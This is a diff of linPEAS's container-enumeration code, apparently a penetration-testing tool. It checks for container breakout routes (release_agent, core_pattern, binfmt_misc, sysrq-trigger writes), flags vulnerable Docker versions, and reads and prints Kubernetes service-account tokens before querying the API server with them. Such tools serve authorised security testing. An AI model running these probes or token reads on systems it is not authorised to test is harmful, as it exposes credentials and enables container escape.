+  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then
+    VULN_CVE_2019_5736="Yes"
+  fi
+}
+
+checkContainerExploits() {
+  VULN_CVE_2019_5021="$(echo_no)"
+  if [ -f "/etc/alpine-release" ]; then
+    alpineVersion=$(cat /etc/alpine-release)
+    if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then
+      VULN_CVE_2019_5021="Yes"
+    fi
+  fi
+}
+
+checkCreateReleaseAgent(){
+  cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys
+  do
+      if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then
+          release_agent_breakout2="Yes (unshare with $subsys)";
+          rm -rf /tmp/cgroup_3628d4
+          break
+      fi
+  done
+}
+
+checkProcSysBreakouts(){
+  dev_mounted="No"
+  if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
+    dev_mounted="Yes";
+  fi
+
+  proc_mounted="No"
+  if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
+    proc_mounted="Yes";
+  fi
+
+  run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null)
+  if ! [ "$run_unshare" = "Yes" ]; then
+    run_unshare="No"
+  fi
+
+  if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then 
+    release_agent_breakout1="Yes"
+  else 
+    release_agent_breakout1="No"
+  fi
+  
+  release_agent_breakout2="No"
+  mkdir /tmp/cgroup_3628d4
+  mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null
+  if [ $? -eq 0 ]; then 
+    release_agent_breakout2="Yes"; 
+    rm -rf /tmp/cgroup_3628d4
+  else 
+    mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null
+    if [ $? -eq 0 ]; then 
+      release_agent_breakout2="Yes"; 
+      rm -rf /tmp/cgroup_3628d4
+    else 
+      checkCreateReleaseAgent
+    fi
+  fi
+  rm -rf /tmp/cgroup_3628d4 2>/dev/null
+  
+  core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)"
+  modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)"
+  panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)"
+  panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)"
+  binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)"
+  proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)"
+  sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes) 2>/dev/null || echo No)"
+  kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)"  # Kernel Exploit Dev
+  kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev
+  mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi
+  kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  kmem_writable="$( (echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  mountinfo_readable="$( (head -n 1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes) 2>/dev/null || echo No)"
+  vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)"
+  security_writable="$( (echo -n '' > /sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)"
+  efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes) 2>/dev/null || echo No)"
+  efi_efivars_writable="$( (echo -n '' > /sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)"
+}
+
+
+##############################################
+#---------------) Containers (---------------#
+##############################################
+containerCheck
+
+print_2title "Container related tools present (if any):"
+command -v docker 
+command -v lxc 
+command -v rkt 
+command -v kubectl
+command -v podman
+command -v runc
+
+if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
+  print_2title "Am I Containered?"
+  execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
+fi
+
+print_2title "Container details"
+print_list "Is this a container? ...........$NC $containerType"
+
+print_list "Any running containers? ........ "$NC
+# Get counts of running containers for each platform
+dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
+podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
+lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
+rktcontainers=$(rkt list 2>/dev/null | tail -n +2  | wc -l)
+if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
+    echo_no
+else
+    containerCounts=""
+    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
+    if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
+    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
+    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
+    echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
+    
+    # List any running containers
+    if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
+    if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
+    if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
+    if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
+fi
+
+#If docker
+if echo "$containerType" | grep -qi "docker"; then
+    print_2title "Docker Container details"
+    inDockerGroup
+    print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
+    enumerateDockerSockets
+    print_list "Docker version .................$NC$dockerVersion"
+    checkDockerVersionExploits
+    print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    if [ "$inContainer" ]; then
+        checkDockerRootless
+        print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
+        echo ""
+    fi
+    if df -h | grep docker; then
+        print_2title "Docker Overlays"
+        df -h | grep docker
+    fi
+fi
+
+#If token secrets mounted
+if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
+  print_2title "Listing mounted tokens"
+  print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
+  ALREADY="IinItialVaaluE"
+  for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
+      TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
+      if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
+          ALREADY="$ALREADY|$TOKEN"
+          echo "Directory: $i"
+          echo "Namespace: $(cat $i)"
+          echo ""
+          echo $TOKEN
+          echo "================================================================================"
+          echo ""
+      fi
+  done
+fi
+
+if [ "$inContainer" ]; then
+    echo ""
+    print_2title "Container & breakout enumeration"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
+    print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
+    if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
+        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
+    fi
+    print_list "Seccomp enabled? ............... "$NC
+    ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+
+    print_list "AppArmor profile? .............. "$NC
+    (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
+
+    print_list "User proc namespace? ........... "$NC
+    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
+
+    checkContainerExploits
+    print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+
+    print_3title "Breakout via mounts"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
+    
+    checkProcSysBreakouts
+    print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
+    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+    if [ "$EXTRA_CHECKS" ]; then
+      print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+    fi
+    
+    echo ""
+    print_3title "Namespaces"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces"
+    ls -l /proc/self/ns/
+
+    if echo "$containerType" | grep -qi "kubernetes"; then
+        print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
+        print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
+        echo ""
+        
+        print_2title "Kubernetes Information"
+        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
+        
+        
+        print_3title "Kubernetes service account folder"
+        ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
+        echo ""
+        
+        print_3title "Kubernetes env vars"
+        (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
+        echo ""
+
+        print_3title "Current sa user k8s permissions"
+        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles"
+        kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
+          "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
+            -X 'POST' -H 'Content-Type: application/json' \
+            --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
+
+    fi
+    echo ""
+
+    print_2title "Container Capabilities"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape"
+    if [ "$(command -v capsh)" ]; then 
+      capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
+    else
+      defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
+      cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
+      echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
+    fi
+    echo ""
+
+    print_2title "Privilege Mode"
+    if [ -x "$(command -v fdisk)" ]; then
+        if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
+            echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
+        else
+            echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
+        fi
+    else
+        echo_not_found
+    fi
+    echo ""
+
+    print_2title "Interesting Files Mounted"
+    (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
+    echo ""
+
+    print_2title "Possible Entrypoints"
+    ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/2_container/1_Container_tools.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/1_Container_tools.sh
@ -1,73 +0,0 @@
-# Title: Container - Container Tools
-# ID: CT_Container_tools
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Find container related tools in the PATH of the system that could be used for container escape:
-#   - Container runtime tools
-#   - Container management tools
-#   - Container networking tools
-#   - Common vulnerable scenarios:
-#     * Misconfigured container tools
-#     * Privileged container tools
-#     * Container escape tools
-#   - Exploitation methods:
-#     * Tool abuse: Exploit container tool misconfigurations
-#     * Common attack vectors:
-#       - Runtime escape
-#       - Privilege escalation
-#       - Container breakout
-#     * Exploit techniques:
-#       - Tool misconfiguration abuse
-#       - Privileged tool exploitation
-#       - Container escape tool usage
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-print_2title "Container related tools present (if any):"
-
-# Container runtimes
-command -v docker
-command -v lxc
-command -v rkt
-command -v podman
-command -v runc
-command -v ctr
-command -v containerd
-command -v crio
-command -v nerdctl
-
-# Container management
-command -v kubectl
-command -v crictl
-command -v docker-compose
-command -v docker-machine
-command -v minikube
-command -v kind
-
-# Container networking
-command -v docker-proxy
-command -v cni
-command -v flanneld
-command -v calicoctl
-
-# Container security
-command -v apparmor_parser
-command -v seccomp
-command -v gvisor
-command -v kata-runtime
-
-# Container debugging
-command -v nsenter
-command -v unshare
-command -v chroot
-command -v capsh
-command -v setcap
-command -v getcap
-
-echo ""
--- a/linPEAS/builder/linpeas_parts/2_container/2_List_mounted_tokens.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/2_List_mounted_tokens.sh
@ -1,33 +0,0 @@
-# Title: Container - List mounted tokens
-# ID: CT_List_mounted_tokens
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: List tokens mounted in the system if any
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables: $ALREADY_TOKENS, $TEMP_TOKEN
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
-  print_2title "Listing mounted tokens"
-  print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
-  ALREADY_TOKENS="IinItialVaaluE"
-  for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
-      TEMP_TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
-      if ! [ $(echo $TEMP_TOKEN | grep -E $ALREADY_TOKENS) ]; then
-          ALREADY_TOKENS="$ALREADY_TOKENS|$TEMP_TOKEN"
-          echo "Directory: $i"
-          echo "Namespace: $(cat $i)"
-          echo ""
-          echo $TEMP_TOKEN
-          echo "================================================================================"
-          echo ""
-      fi
-  done
-fi
-
--- a/linPEAS/builder/linpeas_parts/2_container/3_Container_details.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/3_Container_details.sh
@ -1,109 +0,0 @@
-# Title: Container - Container details
-# ID: CT_Container_details
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Get detailed container information relevant to privilege escalation:
-#   - Container type and runtime
-#   - Running containers
-#   - Container configuration
-#   - Common vulnerable scenarios:
-#     * Misconfigured containers
-#     * Privileged containers
-#     * Exposed container APIs
-#     * Container networking
-#   - Exploitation methods:
-#     * Container breakout: Exploit container misconfigurations
-#     * Common attack vectors:
-#       - Runtime escape
-#       - Privilege escalation
-#       - Container breakout
-#       - Network escape
-#     * Exploit techniques:
-#       - Container misconfiguration abuse
-#       - Privileged container exploitation
-#       - Container API abuse
-#       - Network escape techniques
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: containerCheck, echo_no, print_2title, print_list, warn_exec
-# Global Variables: $containerType
-# Initial Functions: containerCheck
-# Generated Global Variables: $dockercontainers, $podmancontainers, $lxccontainers, $rktcontainers, $containerCounts
-# Fat linpeas: 0
-# Small linpeas: 1
-
-print_2title "Container details"
-
-print_list "Is this a container? ...........$NC $containerType"
-
-# Get container runtime info
-if [ "$(command -v docker || echo -n '')" ]; then
-    print_list "Docker version ...............$NC "
-    warn_exec docker version
-    print_list "Docker info .................$NC "
-    warn_exec docker info
-fi
-
-if [ "$(command -v podman || echo -n '')" ]; then
-    print_list "Podman version ..............$NC "
-    warn_exec podman version
-    print_list "Podman info ................$NC "
-    warn_exec podman info
-fi
-
-if [ "$(command -v lxc || echo -n '')" ]; then
-    print_list "LXC version ................$NC "
-    warn_exec lxc version
-    print_list "LXC info ...................$NC "
-    warn_exec lxc info
-fi
-
-print_list "Any running containers? ........ "$NC
-# Get counts of running containers for each platform
-dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
-podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
-lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
-rktcontainers=$(rkt list 2>/dev/null | tail -n +2  | wc -l)
-if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
-    echo_no
-else
-    containerCounts=""
-    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
-    if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
-    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
-    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
-    echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
-    
-    # List any running containers with more details
-    if [ "$dockercontainers" -ne "0" ]; then 
-        echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"
-        docker ps -a 2>/dev/null
-        #echo "Docker Container Details" | sed -${E} "s,.*,${SED_RED},"
-        #docker inspect $(docker ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g"
-        echo ""
-    fi
-    if [ "$podmancontainers" -ne "0" ]; then 
-        echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"
-        podman ps -a 2>/dev/null
-        #echo "Podman Container Details" | sed -${E} "s,.*,${SED_RED},"
-        #podman inspect $(podman ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g"
-        echo ""
-    fi
-    if [ "$lxccontainers" -ne "0" ]; then 
-        echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"
-        lxc list 2>/dev/null
-        #echo "LXC Container Details" | sed -${E} "s,.*,${SED_RED},"
-        #lxc config show $(lxc list -c n --format csv) 2>/dev/null | grep -E "security.privileged|security.capabilities|security.syscalls" | sed -${E} "s,true|privileged|host,${SED_RED},g"
-        echo ""
-    fi
-    if [ "$rktcontainers" -ne "0" ]; then 
-        echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"
-        rkt list 2>/dev/null
-        #echo "RKT Container Details" | sed -${E} "s,.*,${SED_RED},"
-        #rkt status $(rkt list --format=json 2>/dev/null | jq -r '.[].id') 2>/dev/null | grep -E "privileged|capabilities|security" | sed -${E} "s,true|privileged|host,${SED_RED},g"
-        echo ""
-    fi
-fi
-
-
-echo ""
--- a/linPEAS/builder/linpeas_parts/2_container/4_Docker_container_details.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/4_Docker_container_details.sh
@ -1,37 +0,0 @@
-# Title: Container - Docker Container details
-# ID: CT_Docker_container_details
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Get docker Container details from the inside
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: checkDockerRootless, checkDockerVersionExploits, containerCheck, enumerateDockerSockets, inDockerGroup, print_2title, print_list
-# Global Variables: $containerType, $DOCKER_GROUP, $DOCKER_ROOTLESS, $dockerVersion, $inContainer, $VULN_CVE_2019_5736, $VULN_CVE_2019_13139, $VULN_CVE_2021_41091
-# Initial Functions: containerCheck
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-#If docker
-if echo "$containerType" | grep -qi "docker"; then
-    print_2title "Docker Container details"
-    inDockerGroup
-    print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
-    enumerateDockerSockets
-    print_list "Docker version .................$NC$dockerVersion"
-    checkDockerVersionExploits
-    print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "Vulnerable to CVE-2021-41091 ...$NC$VULN_CVE_2021_41091"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    if [ "$inContainer" ]; then
-        checkDockerRootless
-        print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
-        echo ""
-    fi
-    if df -h | grep docker; then
-        print_2title "Docker Overlays"
-        df -h | grep docker
-    fi
-fi
--- a/linPEAS/builder/linpeas_parts/2_container/5_Container_breakout.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/5_Container_breakout.sh
@ -1,293 +0,0 @@
-# Title: Container - Container & breakout enumeration
-# ID: CT_Container_breakout
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Container breakout enumeration to identify potential escape vectors:
-#   - Container runtime vulnerabilities
-#   - Mount point misconfigurations
-#   - Capability abuse
-#   - Namespace escape
-#   - Common vulnerable scenarios:
-#     * Privileged containers
-#     * Misconfigured mounts
-#     * Excessive capabilities
-#     * Namespace isolation bypass
-#     * Runtime vulnerabilities
-#     * Container escape tools
-#     * Shared kernel exploits
-#     * Container escape CVEs
-#   - Exploitation methods:
-#     * Mount escape: Abuse mount misconfigurations
-#     * Capability abuse: Exploit excessive capabilities
-#     * Namespace escape: Break out of container namespaces
-#     * Runtime escape: Exploit container runtime vulnerabilities
-#     * Common attack vectors:
-#       - Mount point manipulation
-#       - Capability exploitation
-#       - Namespace breakout
-#       - Runtime vulnerability abuse
-#       - Kernel exploit abuse
-#       - Container escape tool usage
-#     * Exploit techniques:
-#       - Mount point abuse
-#       - Capability escalation
-#       - Namespace escape
-#       - Runtime exploitation
-#       - Kernel exploitation
-#       - Container escape tool execution
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: checkContainerExploits, checkProcSysBreakouts, containerCheck, print_2title, print_3title, print_info, print_list, warn_exec
